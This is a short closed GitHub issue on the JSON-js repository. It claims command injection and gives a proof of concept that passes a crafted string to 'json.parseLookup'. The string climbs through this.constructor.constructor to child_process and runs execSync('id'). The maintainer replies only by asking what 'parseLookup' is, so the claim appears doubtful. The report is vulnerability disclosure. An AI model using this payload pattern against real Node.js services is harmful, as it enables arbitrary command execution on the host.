douglascrockford / JSON-js

JSON in JavaScript
http://www.JSON.org/
8.7k stars 4.59k forks

Command Injection in argument #121

Closed po6ix closed 4 years ago

po6ix commented 4 years ago

POC

const json = require('json');

res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]:1}');
console.log(res)

douglascrockford commented 4 years ago

What is 'parseLookup'?